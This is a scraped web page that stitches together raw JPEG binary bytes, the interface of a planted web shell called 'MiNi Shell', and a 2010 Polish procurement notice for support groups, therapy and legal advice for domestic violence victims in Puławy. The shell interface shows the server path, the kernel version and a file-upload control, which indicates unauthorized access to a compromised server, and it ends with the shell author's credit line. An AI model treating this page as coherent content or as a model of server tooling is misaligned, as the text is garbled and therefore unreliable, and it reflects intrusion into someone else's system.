JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100609/160466-N-2010.html

<p class="kh_header"><b>Puławy: zorganizowanie i przeprowadzenie zajęć w ramach Programu aktywności lokalnej - dla osób doświadczających przemocy</b><br>
<b>Numer ogłoszenia: 160466 - 2010; data zamieszczenia: 09.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , al. Królewska 3, 24-100 Puławy, woj. lubelskie, tel. 81888 04 92, faks 81888 04 92.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.efs-pcpr.pulawy.pl      www.pcpr.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie i przeprowadzenie zajęć w ramach Programu aktywności lokalnej - dla osób doświadczających przemocy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie zajęć dla uczestników Programu aktywności lokalnej  - dla osób doświadczających przemocy realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Puławach, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,  Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2. Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie. 
Celem głównym ww. programu jest poprawa funkcjonowania, zapobieganie wykluczeniu społecznemu oraz aktywizacja w celu przywrócenia samodzielności życiowej osób doświadczających przemocy.
Cele szczegółowe to: nabycie przez uczestników grupy wsparcia prawidłowych umiejętności społecznych niezbędnych w kontaktach interpersonalnych, przełamanie wyuczonej bezradności i odzyskanie kontroli nad własnym życiem, wzmocnienie szacunku osobistego, poradzenie sobie z poczuciem winy i napiętnowania, zdobycie wiedzy o procedurach prawnych i możliwościach uzyskania pomocy socjalnej, medycznej i psychologicznej, zdobycie przez uczestników wiedzy na temat zjawiska przemocy domowej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu prowadzona będzie w oparciu o złożone przez wykonawcę oświadczenia i dokumenty na zasadzie: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu prowadzona będzie w oparciu o złożone przez wykonawcę oświadczenia i dokumenty na zasadzie: spełnia/nie spełnia, przy czym za spełniony niniejszy warunek Zamawiający uzna m.in. wykonanie w okresie 3 lat przed dniem wszczęcia postępowania, a jeżeli okres działalności jest krótszy - w tym okresie co najmniej 2 usług szkoleniowych o tożsamym bądź zbliżonym zakresie tematycznym dla poszczególnych części zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. dysponują odpowiednim potencjałem technicznym lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego
Ocena spełniania warunku udziału w postępowaniu prowadzona będzie w oparciu o złożone przez wykonawcę oświadczenia i dokumenty na zasadzie: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostepnienia osób zdolnych do wykonania zamówienia 
Ocena spełniania warunku udziału w postępowaniu prowadzona będzie w oparciu o złożone przez wykonawcę oświadczenia i dokumenty na zasadzie: spełnia/nie spełnia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku udziału w postępowaniu prowadzona będzie w oparciu o złożone przez wykonawcę oświadczenia i dokumenty na zasadzie: spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zaświadczenie/poświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzonego przez właściwy wojewódzki urząd pracy , program zajęć oraz harmonogram wyjazdu w przypadku I części zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a.zmianie terminu zakończenia zamówienia spowodowanej warunkami atmosferycznymi - w przypadku klęski żywiołowej lub gdy warunki   atmosferyczne uniemożliwiają wykonanie zamówienia,
b.zmianie spowodowanej wystąpieniem siły wyższej, czyli zdarzenia którego strony nie mogły przewidzieć i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwią Wykonawcy wykonanie w części lub w całości jego zobowiązań,
c.zmianie warunków płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych Instytucji Wdrażającej dotyczących realizacji projektu,
d.zmianie osób upoważnionych do współpracy w sprawach związanych z wykonaniem umowy, o których mowa w § 8,
e.za zgodą Zamawiającego zmianie osób, przy pomocy których Wykonawca realizować będzie zamówienie, wynikającej z ważnych przyczyn, które nie mogły być wcześniej przewidziane, z zastrzeżeniem, że proponowane przez Wykonawcę osoby będą spełniały warunki określone w SIWZ;  zmiana taka nie wymaga aneksu do umowy;
f.zmianie, w przypadku wystąpienia innych nieprzewidzianych okoliczności mających wpływ na możliwość wykonania umowy( np. żałoba narodowa)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.efs-pcpr.pulawy.pl; www.pcpr.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie
al. Królewska 3
24-100 Puławy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2010 godzina 08:00, miejsce: Powiatowe Centrum Pomocy Rodzinie
al. Królewska 3
24-100 Puławy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program aktywności lokalnej- dla osób doświadczających przemocy  realizowany przez Powiatowe Centrum Pomocy Rodzinie w Puławach, jest współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,  Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2. Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Trening kompetencji i umiejętności społecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie treningu kompetencji i umiejętności społecznych podczas 2- dniowego wyjazdu dla 17 uczestników programu, tj. osób dorosłych z terenu powiatu puławskiego będących ofiarami lub świadkami przemocy domowej łącznie z zakwaterowaniem, ubezpieczeniem od następstw nieszczęśliwych wypadków, wyżywieniem, dowozem z Puław do miejsca zakwaterowania oraz z zapewnieniem powrotu.
2.Termin realizacji zamówienia: 
Okres realizacji to 2 dni - sobota i niedziela, w terminie pomiędzy  1.08.2010r.- 24.10.2010r.
3.Miejsce realizacji: 
Zamawiający zastrzega, aby miejscem realizacji była jedna z niżej wymienionych lokalizacji:
- teren miasta Kazimierza Dolnego, lub
- teren miasta Nałęczowa
4.Wymagalny minimalny zakres tematyczny:  
Trening kompetencji i umiejętności społecznych ma zawierać co najmniej poniższe zagadnienia tematyczne: 
- komunikacja werbalna i niewerbalna,
- asertywność,
- umiejętność stawiania granic,
- radzenie sobie z trudnymi emocjami,
- relaksacja,
- podnoszenie poczucia własnej wartości
5.Sposób prowadzenia szkolenia oraz czas trwania:
Zajęcia mają być zrealizowane w formie grupowej.
Czas    trwania    zajęć   to   łącznie   8   godzin,  przy  czym 1 godzina zajęć  to  45  minut  terapii. Zajęcia mają być prowadzone w okresie 2 dni, po 4 godziny dziennie.
6.Wymagane minimalne kwalifikacje kadry, która będzie prowadziła zajęcia:
Osoba prowadząca zajęcia ma posiadać co najmniej wykształcenie wyższe psychologiczne lub wykształcenie wyższe z uprawnieniami terapeuty.
7.Inne wymagania:
1.Wykonawca ma zapewnić oraz wliczyć w koszt zamówienia także: 
a)  transport autokarowy lub busem osobowym uczestników z Puław do miejsca zakwaterowania oraz przywóz uczestników do Puław, 
b) transport w przypadku gdy odległość od miejsca zakwaterowania do miejsca, w którym odbywać się będą zajęcia przekracza 2 km,
c) pełne wyżywienie (3 posiłki dziennie tj. śniadanie, obiad, kolacja) dla wszystkich  uczestników,
d)  bazę noclegową: 
- zakwaterowanie uczestników w domu wczasowym, pensjonacie lub hotelu w jednym budynku lub w 2 położonych obok siebie,
- zakwaterowanie uczestników w pokojach 2, 3 - osobowych, tj.: 7 pokoi  2-osobowych i 1 pokój 3 - osobowy;
- wszystkie pokoje mają być z pełnym węzłem sanitarnym ( łazienka i 
toaleta) 
e)  opłatę klimatyczną, miejscową i inną związaną z pobytem uczestników za cały okres pobytu, za wszystkich uczestników, jeśli jest wymagana,
f) materiały dydaktyczne/szkoleniowe dla każdego uczestnika niezbędne do realizacji zajęć oraz materiały biurowe dla każdego uczestnika tj. po 1 notatniku A-5 i po 1 długopisie, które po zakończeniu szkolenia stają się własnością uczestników;
Wszystkie materiały szkoleniowe i biurowe wydane uczestnikom winny być oznaczone logotypem PCPR w Puławach, UE, EFS i PO KL, 
g) serwis kawowy dla wszystkich uczestników podczas trwania zajęć ( tj. kawa, herbata, cukier, śmietanka do kawy, woda mineralna, ciastka)
h) ubezpieczenie uczestników od następstw nieszczęśliwych wypadków na czas wyjazdu ( tj. od wyjazdu z Puław do powrotu do Puław),
i) 1 kierownika wyjazdu, do którego zadań należeć ma m.in. nadzór nad prawidłową realizacją harmonogramu wyjazdu i programu zajęć/szkolenia, nadzór nad zaopatrzeniem uczestników w apteczkę pierwszej pomocy, zapoznanie uczestników z zasadami bezpieczeństwa oraz zapewnienie warunków do ich przestrzegania, nadzór nad prowadzeniem dokumentacji,
j) sale  szkoleniowe  wyposażone  w  sprzęt  niezbędny  do  przeprowadzenia danych zajęć, w szczególności w stoły, krzesła, tablica, ekran projekcyjny, 
k) dostęp wszystkich  uczestników do SPA, sauny, basenu, przy czym każdy z uczestników ma mieć zapewnione co najmniej po 3 godziny zegarowe ( tj. 60 min.) zabiegów/zajęć 
2.Uczestnicy otrzymają zaświadczenie o uczestnictwie w treningu kompetencji i umiejętności społecznych, które ma być oznaczone logotypem PCPR w Puławach, UE, EFS i PO KL,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Poradnictwo specjalistyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zorganizowanie grupy wsparcia, indywidualnej terapii psychologicznej oraz poradnictwa prawnego dla 17 uczestników programu tj. osób doświadczających przemocy domowej lub będących jej świadkami.
2.Termin realizacji zamówienia:
Zamawiający zastrzega, że zamówienie ma być zrealizowane w okresie pomiędzy 15.07.2010r. a 10.12.2010r., z zastrzeżeniem, że poszczególne zajęcia mają się odbywać w  następujących terminach, okresach:
a) grupa wsparcia:
Spotkania grupy wsparcia mają odbywać się, w następujących dniach: 16.07.2010r., 30.07.2010r., 13.08.2010r., 27.08.2010r., 10.09.2010r., 24.09.2010r., 1.10.2010r., 15.10.2010r., 29.10.2010r., 10.11.2010r., 26.11.2010r., 3.12.2010r.; w godzinach pomiędzy 16:00-19:00.
b) indywidualna terapia psychologiczna
Spotkania z uczestnikami mają odbywać się od poniedziałku do piątku, z wyjątkiem dni świątecznych, w godzinach pomiędzy 9:00-18:00.
c) poradnictwo prawne
Zajęcia odbywać się mają od poniedziałku do soboty z wyjątkiem dni świątecznych w godzinach pomiędzy 10:00- 18:00.
3.Miejsce realizacji: 
Zamawiający zastrzega, że zamówienie ma być wykonane na terenie miasta Puławy.
4.Wymagalny minimalny zakres tematyczny: 
Poradnictwo specjalistyczne ma zawierać co najmniej poniższe zagadnienia tematyczne w zależności od rodzaju zajęć:
a)grupa wsparcia:
- rozwiązywanie bieżących problemów uczestników,
- wsparcie emocjonalne,
- przepracowanie problemów,
- odblokowanie emocji,
- informacje z zakresu interwencji kryzysowej, mediacji rodzinnej, praw i uprawnień osób  doświadczających przemocy;
b)indywidualna terapia psychologiczna
- terapia dostosowana do indywidualnych (zgłaszanych) oczekiwań każdego uczestnika programu;
c)poradnictwo prawne:
- udzielanie informacji o prawach i uprawnieniach służące przywróceniu samodzielności życiowej z zakresu prawa rodzinnego i opiekuńczego, prawa karnego, prawa cywilnego, zabezpieczenia społecznego, ochrony praw lokatorów, ustawy o przeciwdziałaniu przemocy w rodzinie, 
5.Sposób prowadzenia szkolenia oraz czas trwania:
a)   grupa wsparcia-
Grupa wsparcia ma być prowadzona w formie grupowej. Ma się odbyć            łącznie  12 spotkań, a każde z nich trwać po 4 godziny (tj. łącznie 48 godziny zajęć)  przy czym jedna godzina to 45 minut zajęć.
b)	indywidualna terapia psychologiczna-
Ma być prowadzona w formie indywidualnych spotkań. Każdy z uczestników    ma odbyć 4 godziny indywidualnej terapii psychologicznej, czyli łącznie ma się odbyć 68 godzin terapii psychologicznej, przy czym 1 godzina to 45 minut terapii.
c)poradnictwo prawne
Poradnictwo prawne ma być prowadzone w formie indywidualnych spotkań. Na każdego z uczestników ma przypadać po 2 godziny poradnictwa prawnego, przy czym 1 godzina to 45 minut zajęć. Łącznie ma się odbyć 34 godziny poradnictwa.
6.Wymagane minimalne kwalifikacje kadry, która będzie prowadziła zajęcia:
a) grupa wsparcia -
osoba prowadząca powinna mieć co najmniej wykształcenie wyższe psychologiczne lub wykształcenie wyższe i uprawnienia terapeuty;
b) indywidualna terapia psychologiczna-
osoba prowadząca terapię powinna mieć co najmniej wykształcenie wyższe psychologiczne lub wykształcenie wyższe i uprawnienia terapeuty;
c)poradnictwo prawne
osoba prowadząca zajęcia powinna posiadać co najmniej wykształcenie wyższe prawnicze
7.Inne wymagania:
a)serwis kawowy podczas zajęć dla każdego uczestnika tj. kawa, herbata, woda mineralna, śmietanka do kawy, paluszki, ciastka,
b)w trakcie grupy wsparcia dla każdego uczestnika 1 ciepły posiłek tj. drugie danie obiadowe,
c)sale  szkoleniowe  wyposażone  w  sprzęt  niezbędny  do  przeprowadzenia danych zajęć, w szczególności w stoły, krzesła, tablica, ekran projekcyjny, 
d)wykonawca zapewnić ma dla każdego uczestnika materiały szkoleniowe niezbędne do realizacji zajęć, które po zakończeniu szkolenia stają się własnością uczestników; Materiały wydane uczestnikom oznaczone mają być logotypem PCPR w Puławach, UE, EFS i PO KL, 
e)każdy z uczestników otrzyma zaświadczenie o uczestnictwie w poradnictwie specjalistycznym, które ma być oznaczone logotypem PCPR w Puławach, UE, EFS i PO KL,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com